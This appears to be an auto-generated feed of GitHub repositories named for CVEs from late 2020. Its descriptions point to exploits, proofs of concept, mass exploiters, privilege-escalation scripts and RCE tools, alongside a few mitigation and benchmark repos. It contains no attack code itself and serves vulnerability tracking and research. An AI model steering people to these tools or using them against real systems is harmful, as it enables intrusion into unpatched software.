**A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device** : [nyc-tophile/A2SV--SSL-VUL-Scan](https://github.com/nyc-tophile/A2SV--SSL-VUL-Scan) create time: 2021-01-01T12:26:08Z

**Showcase repository for CVE-2020-35717** : [hmartos/cve-2020-35717](https://github.com/hmartos/cve-2020-35717) create time: 2021-01-01T08:53:53Z

**zerologon script to exploit CVE-2020-1472 CVSS 10/10** : [wrathfulDiety/zerologon](https://github.com/wrathfulDiety/zerologon) create time: 2021-01-01T07:38:58Z

**an impacket-dependent script exploiting CVE-2019-1040** : [QAX-A-Team/dcpwn](https://github.com/QAX-A-Team/dcpwn) create time: 2021-01-01T05:59:06Z

**no description** : [PenTestical/CVE-2020-9484](https://github.com/PenTestical/CVE-2020-9484) create time: 2020-12-31T21:54:50Z

**no description** : [Rapidsafeguard/codesnippets_CVE-2020-8417](https://github.com/Rapidsafeguard/codesnippets_CVE-2020-8417) create time: 2020-12-31T20:03:29Z

**The report and the exploit of CVE-2021-26943, the kernel-to-SMM local privilege escalation vulnerability in ASUS UX360CA BIOS version 303.** : [tandasat/SmmExploit](https://github.com/tandasat/SmmExploit) create time: 2020-12-31T16:30:02Z

**no description** : [Limesss/cve-2019-18683](https://github.com/Limesss/cve-2019-18683) create time: 2020-12-31T15:40:28Z

**Cisco IP Phone 11.7 - Denial of Service (PoC)** : [abood05972/CVE-2020-3161](https://github.com/abood05972/CVE-2020-3161) create time: 2020-12-31T15:37:48Z

**no description** : [PLP-Orange/cve-2018-6574-exercise](https://github.com/PLP-Orange/cve-2018-6574-exercise) create time: 2020-12-31T10:57:21Z

**CVE-2020-35728 & Jackson-databind RCE** : [Al1ex/CVE-2020-35728](https://github.com/Al1ex/CVE-2020-35728) create time: 2020-12-31T01:55:39Z

**Todos los materiales necesarios para la PoC en Chrome y ftview** : [Marmeus/CVE-2020-15999](https://github.com/Marmeus/CVE-2020-15999) create time: 2020-12-30T19:58:33Z

**Repositorio con un script encargado de explotar la vulnerabilidad CVE-2020-15999** : [maarlo/CVE-2020-15999](https://github.com/maarlo/CVE-2020-15999) create time: 2020-12-30T18:02:23Z

**no description** : [CyborgSecurity/CVE-2020-17530](https://github.com/CyborgSecurity/CVE-2020-17530) create time: 2020-12-30T17:23:20Z

**CVE-2020-6308 mass exploiter/fuzzer.** : [freeFV/CVE-2020-6308-mass-exploiter](https://github.com/freeFV/CVE-2020-6308-mass-exploiter) create time: 2020-12-30T03:08:17Z

**Revisited CVE-2016-9795 privilege escalation (casrvc binary from CA Common Services suite)** : [blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited](https://github.com/blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited) create time: 2020-12-29T21:07:09Z

**Campeonato Virtual Equipado Powerlifting 2020** : [Fedepotencia/2020_CVEP](https://github.com/Fedepotencia/2020_CVEP) create time: 2020-12-29T17:12:06Z

**no description** : [vishack/CVE-2018-6574](https://github.com/vishack/CVE-2018-6574) create time: 2020-12-29T12:27:06Z

**CodeTest信息收集和漏洞利用工具,可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作,漏洞利用模块可选择需要测试的漏洞模块,或者选择所有模块测试,包含CVE-2020-14882, CVE-2020-2555等,可自己收集脚本后按照模板进行修改。** : [xkx518/CodeTest](https://github.com/xkx518/CodeTest) create time: 2020-12-29T09:11:31Z

**no description** : [rdoix/CVE-2020-10148-Solarwinds-Orion](https://github.com/rdoix/CVE-2020-10148-Solarwinds-Orion) create time: 2020-12-29T03:17:56Z

**Java deserialization exploit for elasticsearch 1.5.2 CVE-2015-5377** : [fierobot/elasticsearch_CVE-2015-5377](https://github.com/fierobot/elasticsearch_CVE-2015-5377) create time: 2020-12-28T21:30:22Z

**cve-2020-27955** : [TheTh1nk3r/cve-2020-27955](https://github.com/TheTh1nk3r/cve-2020-27955) create time: 2020-12-28T13:27:27Z

**CVE-2020-17035 patch analysis** : [flamelu/CVE-2020-17035-patch-analysis](https://github.com/flamelu/CVE-2020-17035-patch-analysis) create time: 2020-12-28T07:50:00Z

**no description** : [sinlee1/CVE-2019-0708](https://github.com/sinlee1/CVE-2019-0708) create time: 2020-12-27T13:15:20Z

**no description** : [RAVIPRAJ/cve-2019](https://github.com/RAVIPRAJ/cve-2019) create time: 2020-12-27T11:21:39Z

**PoC CVE-2020-6308** : [InitRoot/CVE-2020-6308-PoC](https://github.com/InitRoot/CVE-2020-6308-PoC) create time: 2020-12-27T10:37:11Z

**Exploiting the CVE-2016-10555** : [thepcn3rd/jwtToken-CVE-2016-10555](https://github.com/thepcn3rd/jwtToken-CVE-2016-10555) create time: 2020-12-26T22:37:53Z

**no description** : [Abady0x/CVE-2017-16651](https://github.com/Abady0x/CVE-2017-16651) create time: 2020-12-26T10:53:38Z

**This is a test to exploit with CVE-2020-27955** : [SilverSkyFlyingFeather/CVE-2020-27955-TEST](https://github.com/SilverSkyFlyingFeather/CVE-2020-27955-TEST) create time: 2020-12-26T08:17:43Z

**cve-2018-1133 moodle athenticated as teacher remote code execution.** : [Feidao-fei/MOODLE-3.X-Remote-Code-Execution](https://github.com/Feidao-fei/MOODLE-3.X-Remote-Code-Execution) create time: 2020-12-26T08:09:19Z

**no description** : [taipansec/CVE-2020-8165](https://github.com/taipansec/CVE-2020-8165) create time: 2020-12-25T20:07:27Z

**CVE-2020-11652 & CVE-2020-11651** : [Al1ex/CVE-2020-11652](https://github.com/Al1ex/CVE-2020-11652) create time: 2020-12-25T02:58:35Z

**Wing FTP Server 6.2.5 - Privilege Escalation** : [Al1ex/CVE-2020-9470](https://github.com/Al1ex/CVE-2020-9470) create time: 2020-12-25T01:53:45Z

**Wing FTP Server 6.2.3 - Privilege Escalation** : [Al1ex/CVE-2020-8635](https://github.com/Al1ex/CVE-2020-8635) create time: 2020-12-25T01:15:13Z

**Insecure Folder permission that lead to privilege escalation** : [zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169](https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169) create time: 2020-12-24T10:27:30Z

**The (WordPress) website test script can be exploited for Unlimited File Upload via CVE-2020-35489** : [dn9uy3n/Check-WP-CVE-2020-35489](https://github.com/dn9uy3n/Check-WP-CVE-2020-35489) create time: 2020-12-24T09:10:17Z

**Weblogic Server CVE-2020-14645 EXP for Python (complete in one step)** : [Schira4396/CVE-2020-14645](https://github.com/Schira4396/CVE-2020-14645) create time: 2020-12-24T05:46:55Z

**CVE-2020-17008 splWOW64 Elevation of Privilege** : [jas502n/CVE-2020-17008](https://github.com/jas502n/CVE-2020-17008) create time: 2020-12-24T04:00:29Z

**CTFs are fun, but what about exploiting a real bug?** : [mephi42/CVE-2016-8863](https://github.com/mephi42/CVE-2016-8863) create time: 2020-12-24T02:02:27Z

**Brute-force tool for WordPress Plugin Limit Login Attempts Reloaded >=2.13.0 - Login Limit Bypass (CVE-2020-35590)** : [N4nj0/CVE-2020-35590](https://github.com/N4nj0/CVE-2020-35590) create time: 2020-12-23T23:11:34Z

**Webmin Exploit Scanner CVE-2020-35606 CVE-2019-12840** : [anasbousselham/webminscan](https://github.com/anasbousselham/webminscan) create time: 2020-12-23T18:22:36Z

**cve-2020-17057 poc** : [ze0r/cve-2020-17057](https://github.com/ze0r/cve-2020-17057) create time: 2020-12-23T10:02:47Z

**no description** : [SaharAttackit/CVE-2020-1472](https://github.com/SaharAttackit/CVE-2020-1472) create time: 2020-12-23T08:12:21Z

**no description** : [NikolaT3sla/cve-2018-6574](https://github.com/NikolaT3sla/cve-2018-6574) create time: 2020-12-22T20:50:06Z

**CVE-2020-28243 Local Privledge Escalation Exploit in SaltStack Minion** : [stealthcopter/CVE-2020-28243](https://github.com/stealthcopter/CVE-2020-28243) create time: 2020-12-22T19:35:15Z

**based on nginx 1.19.5 to fix for CVE-2018-16843, CVE-2018-16844, CVE-2019-9511, CVE-2019-9513, and CVE-2019-9516** : [flyniu666/ingress-nginx-0.21-1.19.5](https://github.com/flyniu666/ingress-nginx-0.21-1.19.5) create time: 2020-12-22T10:16:11Z

**Supervisord远程命令执行漏洞脚本** : [yaunsky/CVE-2017-11610](https://github.com/yaunsky/CVE-2017-11610) create time: 2020-12-22T09:08:49Z

**CVE-2020-13942 Apache Unomi 远程代码执行漏洞脚getshell** : [yaunsky/Unomi-CVE-2020-13942](https://github.com/yaunsky/Unomi-CVE-2020-13942) create time: 2020-12-22T02:57:50Z

**Laravel RCE exploit. CVE-2018-15133** : [PwnedShell/Larascript](https://github.com/PwnedShell/Larascript) create time: 2020-12-21T22:02:08Z

**woocommerce wordpress plugin - Affected Version: V 4.5.2 [CVE-2020-29156]** : [Ko-kn3t/CVE-2020-29156](https://github.com/Ko-kn3t/CVE-2020-29156) create time: 2020-12-21T20:38:50Z

**PoC for CVE-2015_1427** : [h3inzzz/cve2015_1427](https://github.com/h3inzzz/cve2015_1427) create time: 2020-12-21T15:02:55Z

**no description** : [shadofren/CVE-2018-6574](https://github.com/shadofren/CVE-2018-6574) create time: 2020-12-21T14:01:41Z

**DirtyCOW Exploit for Android** : [DanielEbert/CVE-2016-5195](https://github.com/DanielEbert/CVE-2016-5195) create time: 2020-12-20T19:17:10Z

**https://github.com/awakened1712/CVE-2019-11932://github.com/awakened1712/CVE-2019-11932** : [BadAssAiras/hello](https://github.com/BadAssAiras/hello) create time: 2020-12-20T13:17:19Z

**POC for CVE-2018-0114 written in Go** : [adityathebe/POC-CVE-2018-0114](https://github.com/adityathebe/POC-CVE-2018-0114) create time: 2020-12-20T09:29:35Z

**Prisma Cloud Compute Admission rules to mitigate Kubernetes CVE-2020-8554** : [twistlock/k8s-cve-2020-8554-mitigations](https://github.com/twistlock/k8s-cve-2020-8554-mitigations) create time: 2020-12-20T04:22:43Z

**Collection of PoCs created for SmarterMail < Build 6985 RCE** : [devzspy/CVE-2019-7214](https://github.com/devzspy/CVE-2019-7214) create time: 2020-12-20T01:00:02Z

**A generative test that would've caught CVE-2020-28052** : [madstap/bouncy-castle-generative-test-poc](https://github.com/madstap/bouncy-castle-generative-test-poc) create time: 2020-12-19T22:22:45Z

**CVE-2019-15588 靶场: RCE 命令注入漏洞** : [lyy289065406/CVE-2019-15588](https://github.com/lyy289065406/CVE-2019-15588) create time: 2020-12-19T05:11:03Z

**no description** : [CreatePhotonW/CVE-2019-0752](https://github.com/CreatePhotonW/CVE-2019-0752) create time: 2020-12-18T22:53:16Z

**no description** : [CreatePhotonW/CVE-2019-1221](https://github.com/CreatePhotonW/CVE-2019-1221) create time: 2020-12-18T22:28:11Z

**Full chain Chrome 71.0.3578.98 exploit** : [CreatePhotonW/CVE-2019-5782_CVE-2019-13768](https://github.com/CreatePhotonW/CVE-2019-5782_CVE-2019-13768) create time: 2020-12-18T21:57:26Z

**SnatchBox (CVE-2020-27935) is a sandbox escape vulnerability and exploit affecting macOS up to version 10.15.x** : [LIJI32/SnatchBox](https://github.com/LIJI32/SnatchBox) create time: 2020-12-18T14:39:28Z

**(cve-2020-17530) struts2_s2-061 freemarker_RCE testscript** : [ludy-dev/freemarker_RCE_struts2_s2-061](https://github.com/ludy-dev/freemarker_RCE_struts2_s2-061) create time: 2020-12-18T07:03:57Z

**CVE-2020-2978** : [emad-almousa/CVE-2020-2978](https://github.com/emad-almousa/CVE-2020-2978) create time: 2020-12-18T06:56:51Z

**no description** : [FilipeFraqueiro/CVE-2018-6574](https://github.com/FilipeFraqueiro/CVE-2018-6574) create time: 2020-12-17T16:09:07Z

**MOVEit Transfer 2020 web application Stored Cross-Site Scripting (XSS)** : [SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647](https://github.com/SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647) create time: 2020-12-17T12:23:18Z

**Script for CVE2019_16278** : [sunnet-cyber/CVE2019_16278](https://github.com/sunnet-cyber/CVE2019_16278) create time: 2020-12-17T10:07:56Z

**POC for CVE-2020-27955** : [shubham0d/CVE-2020-27955](https://github.com/shubham0d/CVE-2020-27955) create time: 2020-12-17T06:14:30Z

**CVE-2019-5475 靶场: RCE 命令注入漏洞** : [lyy289065406/CVE-2019-5475](https://github.com/lyy289065406/CVE-2019-5475) create time: 2020-12-16T14:03:16Z

**cve-2020-0022相关的一些东西** : [5k1l/cve-2020-0022](https://github.com/5k1l/cve-2020-0022) create time: 2020-12-16T06:25:41Z

**no description** : [GuillaumePetit84/CVE-2020-35488](https://github.com/GuillaumePetit84/CVE-2020-35488) create time: 2020-12-15T17:55:07Z

**Apache Solr 1.4 Injection to get a shell** : [xkyrage/Exploit_CVE-2019-17558-RCE](https://github.com/xkyrage/Exploit_CVE-2019-17558-RCE) create time: 2020-12-15T04:38:06Z

**no description** : [seemoo-lab/dtrace-memaccess_cve-2020-27949](https://github.com/seemoo-lab/dtrace-memaccess_cve-2020-27949) create time: 2020-12-14T19:39:42Z

**Fortinet FortiOS路径遍历漏洞 (CVE-2018-13379)批量检测脚本** : [B1anda0/CVE-2018-13379](https://github.com/B1anda0/CVE-2018-13379) create time: 2020-12-14T12:17:03Z

**https://hackerone.com/reports/863553** : [skr0x1c0/SSRF-CVE-2020-15002](https://github.com/skr0x1c0/SSRF-CVE-2020-15002) create time: 2020-12-14T07:50:45Z

**https://hackerone.com/reports/865652** : [skr0x1c0/Blind-SSRF-CVE-2020-15002](https://github.com/skr0x1c0/Blind-SSRF-CVE-2020-15002) create time: 2020-12-14T07:48:44Z

**CVE-2020-17530-strust2-061** : [fengziHK/CVE-2020-17530-strust2-061](https://github.com/fengziHK/CVE-2020-17530-strust2-061) create time: 2020-12-14T06:54:57Z

**no description** : [qlh831/x-CVE-2020-27190](https://github.com/qlh831/x-CVE-2020-27190) create time: 2020-12-14T06:44:37Z

**CVE-2014-0160 OpenSSL Heartbleed Proof of Concept** : [GuillermoEscobero/heartbleed](https://github.com/GuillermoEscobero/heartbleed) create time: 2020-12-13T19:53:50Z

**CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.** : [jas502n/CVE-2020-26259](https://github.com/jas502n/CVE-2020-26259) create time: 2020-12-13T17:39:11Z

**no description** : [cygenta/CVE-2020-3452](https://github.com/cygenta/CVE-2020-3452) create time: 2020-12-13T13:47:38Z

**version between CVE-2018-20433 and CVE-2019-5427** : [shanika04/cp30_XXE_partial_fix](https://github.com/shanika04/cp30_XXE_partial_fix) create time: 2020-12-13T12:08:30Z

**S2-061 CVE-2020-17530** : [Al1ex/CVE-2020-17530](https://github.com/Al1ex/CVE-2020-17530) create time: 2020-12-13T11:02:15Z

**no description** : [soshewh97/CVE-2019-0230_Struts2S2-059](https://github.com/soshewh97/CVE-2019-0230_Struts2S2-059) create time: 2020-12-11T18:57:14Z

**Mitigate CVE-2020-8554 with Policy Controller in Anthos** : [jrmurray000/CVE-2020-8554](https://github.com/jrmurray000/CVE-2020-8554) create time: 2020-12-11T17:40:47Z

**no description** : [MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master](https://github.com/MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master) create time: 2020-12-11T09:31:06Z

**no description** : [MasterSploit/CVE-2020-0787](https://github.com/MasterSploit/CVE-2020-0787) create time: 2020-12-11T09:27:34Z

**S2-059(CVE-2019-0230)** : [Al1ex/CVE-2019-0230](https://github.com/Al1ex/CVE-2019-0230) create time: 2020-12-11T03:40:04Z

**no description** : [williamgoulois/git-lfs-RCE-exploit-CVE-2020-27955-revshell](https://github.com/williamgoulois/git-lfs-RCE-exploit-CVE-2020-27955-revshell) create time: 2020-12-10T21:31:24Z

**TikiWiki 21.2 allows to edit templates without the use of a CSRF protection.** : [S1lkys/CVE-2020-29254](https://github.com/S1lkys/CVE-2020-29254) create time: 2020-12-10T18:13:47Z

**S2-061 的payload,以及对应简单的PoC/Exp** : [wuzuowei/CVE-2020-17530](https://github.com/wuzuowei/CVE-2020-17530) create time: 2020-12-10T17:42:37Z

**no description** : [jet-pentest/CVE-2020-29667](https://github.com/jet-pentest/CVE-2020-29667) create time: 2020-12-10T06:43:58Z

**no description** : [jet-pentest/CVE-2020-29666](https://github.com/jet-pentest/CVE-2020-29666) create time: 2020-12-10T06:24:48Z

**CVE-2020-1971 Auto Scan & Remote Exploit Script. Auto Local Scan & Patch Script.** : [MBHudson/CVE-2020-1971](https://github.com/MBHudson/CVE-2020-1971) create time: 2020-12-09T21:32:15Z

**weaponized tool for CVE-2020-17144** : [zcgonvh/CVE-2020-17144](https://github.com/zcgonvh/CVE-2020-17144) create time: 2020-12-09T20:57:16Z

**no description** : [ossf-cve-benchmark/CVE-2020-26256](https://github.com/ossf-cve-benchmark/CVE-2020-26256) create time: 2020-12-09T18:46:54Z

**no description** : [WildfootW/CVE-2018-15473_OpenSSH_7.7](https://github.com/WildfootW/CVE-2018-15473_OpenSSH_7.7) create time: 2020-12-09T15:09:31Z

**no description** : [WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed](https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed) create time: 2020-12-09T15:08:21Z

**no description** : [WildfootW/CVE-2007-2447_Samba_3.0.25rc3](https://github.com/WildfootW/CVE-2007-2447_Samba_3.0.25rc3) create time: 2020-12-09T15:04:44Z

**Exchange2010 authorized RCE** : [Airboi/CVE-2020-17144-EXP](https://github.com/Airboi/CVE-2020-17144-EXP) create time: 2020-12-09T10:30:16Z

**no description** : [ka1n4t/CVE-2020-17530](https://github.com/ka1n4t/CVE-2020-17530) create time: 2020-12-09T09:53:08Z

**Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。提醒我校Apache Struts用户尽快采取安全措施阻止漏洞攻击。** : [154802388/CVE-2020-17531](https://github.com/154802388/CVE-2020-17531) create time: 2020-12-09T08:01:10Z

**Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。提醒我校Apache Struts用户尽快采取安全措施阻止漏洞攻击。** : [pangyu360es/CVE-2020-17530](https://github.com/pangyu360es/CVE-2020-17530) create time: 2020-12-09T01:29:23Z

**no description** : [ciakim/CVE-2020-17530](https://github.com/ciakim/CVE-2020-17530) create time: 2020-12-08T15:48:29Z

**no description** : [ossf-cve-benchmark/CVE-2020-15256](https://github.com/ossf-cve-benchmark/CVE-2020-15256) create time: 2020-12-08T13:40:01Z

**no description** : [ossf-cve-benchmark/CVE-2020-8244](https://github.com/ossf-cve-benchmark/CVE-2020-8244) create time: 2020-12-08T13:40:01Z

**no description** : [ossf-cve-benchmark/CVE-2020-26226](https://github.com/ossf-cve-benchmark/CVE-2020-26226) create time: 2020-12-08T13:40:01Z

**no description** : [ossf-cve-benchmark/CVE-2020-7750](https://github.com/ossf-cve-benchmark/CVE-2020-7750) create time: 2020-12-08T13:40:01Z

**no description** : [ossf-cve-benchmark/CVE-2020-7763](https://github.com/ossf-cve-benchmark/CVE-2020-7763) create time: 2020-12-08T13:40:01Z

**no description** : [ossf-cve-benchmark/CVE-2020-9038](https://github.com/ossf-cve-benchmark/CVE-2020-9038) create time: 2020-12-08T13:40:01Z

**Remote code execution in Mediawiki Score** : [seqred-s-a/cve-2020-29007](https://github.com/seqred-s-a/cve-2020-29007) create time: 2020-12-08T13:27:31Z

**hack,poc** : [phil-fly/CVE-2020-17530](https://github.com/phil-fly/CVE-2020-17530) create time: 2020-12-08T11:10:46Z

**POC-CVE-2020-7961-Token-iterate** : [shacojx/POC-CVE-2020-7961-Token-iterate](https://github.com/shacojx/POC-CVE-2020-7961-Token-iterate) create time: 2020-12-08T08:22:18Z

**CVE-2020-26217 XStream RCE POC** : [novysodope/CVE-2020-26217-XStream-RCE-POC](https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC) create time: 2020-12-08T07:58:41Z

**SQLi CVE-2019-5454** : [shanika04/nextcloud_android](https://github.com/shanika04/nextcloud_android) create time: 2020-12-07T14:53:25Z

**Proof of concept for CVE-2020-15257 in containerd.** : [nccgroup/abstractshimmer](https://github.com/nccgroup/abstractshimmer) create time: 2020-12-07T08:47:09Z

**Exploit for the vulnerability CVE-2007-2447** : [xlcc4096/exploit-CVE-2007-2447](https://github.com/xlcc4096/exploit-CVE-2007-2447) create time: 2020-12-06T18:04:44Z

**PoC for CVE: 2017-5638 - Apache Struts2 S2-045** : [jongmartinez/CVE-2017-5638](https://github.com/jongmartinez/CVE-2017-5638) create time: 2020-12-06T16:16:43Z

**Poc of CVE-2020-0113 & CVE-2020-0108** : [XDo0/ServiceCheater](https://github.com/XDo0/ServiceCheater) create time: 2020-12-06T13:27:33Z

**Analisis y descripcion de una vulnerabilidad que afecta a Drupal (CVE 2018-7600). Trabajo realizado para la asignatura Seguridad en Sistemas Informáticos.** : [VictorMora97/Drupalgeddon2](https://github.com/VictorMora97/Drupalgeddon2) create time: 2020-12-06T12:29:44Z

**no description** : [Resery/CVE-2019-17041](https://github.com/Resery/CVE-2019-17041) create time: 2020-12-05T07:49:11Z

**This small script helps to avoid using MetaSploit (msfconsole) during the Enterprise pentests and OSCP-like exams. Grep included function will help you to get only the important information.** : [IvanGlinkin/CVE-2006-3392](https://github.com/IvanGlinkin/CVE-2006-3392) create time: 2020-12-04T11:44:22Z

**Double Free** : [brahmiboudjema/CVE-2020-25637-libvirt-double-free](https://github.com/brahmiboudjema/CVE-2020-25637-libvirt-double-free) create time: 2020-12-04T11:01:29Z

**Macally WIFISD2** : [code-byter/CVE-2020-29669](https://github.com/code-byter/CVE-2020-29669) create time: 2020-12-03T20:00:09Z

**no description** : [securifera/CVE-2019-14450](https://github.com/securifera/CVE-2019-14450) create time: 2020-12-03T15:54:39Z

**no description** : [diegojuan/CVE-2019-15107](https://github.com/diegojuan/CVE-2019-15107) create time: 2020-12-03T15:43:39Z

**no description** : [ActorExpose/CVE-2017-11882](https://github.com/ActorExpose/CVE-2017-11882) create time: 2020-12-03T15:00:27Z

**Scan through given ip list** : [DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit](https://github.com/DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit) create time: 2020-12-03T07:40:19Z

**CVE-2020-8554: Man in the middle using LoadBalancer or ExternalIPs** : [rancher/externalip-webhook](https://github.com/rancher/externalip-webhook) create time: 2020-12-01T16:58:39Z

**CVE-2020-27950 exploit** : [synacktiv/CVE-2020-27950](https://github.com/synacktiv/CVE-2020-27950) create time: 2020-12-01T15:49:07Z

**Python script to scan for enabled OpenSLP services** : [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992) create time: 2020-12-01T13:49:26Z

**no description** : [ossf-cve-benchmark/CVE-2016-10735](https://github.com/ossf-cve-benchmark/CVE-2016-10735) create time: 2020-12-01T12:37:53Z

**no description** : [ossf-cve-benchmark/CVE-2016-1000229](https://github.com/ossf-cve-benchmark/CVE-2016-1000229) create time: 2020-12-01T12:37:53Z

**no description** : [ossf-cve-benchmark/CVE-2018-3713](https://github.com/ossf-cve-benchmark/CVE-2018-3713) create time: 2020-12-01T12:24:58Z

**no description** : [ossf-cve-benchmark/CVE-2020-15156](https://github.com/ossf-cve-benchmark/CVE-2020-15156) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-11021](https://github.com/ossf-cve-benchmark/CVE-2020-11021) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-15092](https://github.com/ossf-cve-benchmark/CVE-2020-15092) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-4051](https://github.com/ossf-cve-benchmark/CVE-2020-4051) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-27666](https://github.com/ossf-cve-benchmark/CVE-2020-27666) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-15135](https://github.com/ossf-cve-benchmark/CVE-2020-15135) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-15095](https://github.com/ossf-cve-benchmark/CVE-2020-15095) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-15152](https://github.com/ossf-cve-benchmark/CVE-2020-15152) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-4059](https://github.com/ossf-cve-benchmark/CVE-2020-4059) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-5251](https://github.com/ossf-cve-benchmark/CVE-2020-5251) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-11079](https://github.com/ossf-cve-benchmark/CVE-2020-11079) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-12265](https://github.com/ossf-cve-benchmark/CVE-2020-12265) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-14000](https://github.com/ossf-cve-benchmark/CVE-2020-14000) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-15119](https://github.com/ossf-cve-benchmark/CVE-2020-15119) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-5258](https://github.com/ossf-cve-benchmark/CVE-2020-5258) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-6836](https://github.com/ossf-cve-benchmark/CVE-2020-6836) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-7638](https://github.com/ossf-cve-benchmark/CVE-2020-7638) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-7660](https://github.com/ossf-cve-benchmark/CVE-2020-7660) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-7662](https://github.com/ossf-cve-benchmark/CVE-2020-7662) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-7676](https://github.com/ossf-cve-benchmark/CVE-2020-7676) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-7699](https://github.com/ossf-cve-benchmark/CVE-2020-7699) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-7720](https://github.com/ossf-cve-benchmark/CVE-2020-7720) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-8116](https://github.com/ossf-cve-benchmark/CVE-2020-8116) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-8149](https://github.com/ossf-cve-benchmark/CVE-2020-8149) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-8192](https://github.com/ossf-cve-benchmark/CVE-2020-8192) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-8203](https://github.com/ossf-cve-benchmark/CVE-2020-8203) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-15123](https://github.com/ossf-cve-benchmark/CVE-2020-15123) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-15138](https://github.com/ossf-cve-benchmark/CVE-2020-15138) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-4066](https://github.com/ossf-cve-benchmark/CVE-2020-4066) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-7656](https://github.com/ossf-cve-benchmark/CVE-2020-7656) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-8135](https://github.com/ossf-cve-benchmark/CVE-2020-8135) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2020-8205](https://github.com/ossf-cve-benchmark/CVE-2020-8205) create time: 2020-12-01T09:45:48Z

**no description** : [ossf-cve-benchmark/CVE-2019-15782](https://github.com/ossf-cve-benchmark/CVE-2019-15782) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-11358](https://github.com/ossf-cve-benchmark/CVE-2019-11358) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-17495](https://github.com/ossf-cve-benchmark/CVE-2019-17495) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-15657](https://github.com/ossf-cve-benchmark/CVE-2019-15657) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-5444](https://github.com/ossf-cve-benchmark/CVE-2019-5444) create time: 2020-12-01T09:18:58Z

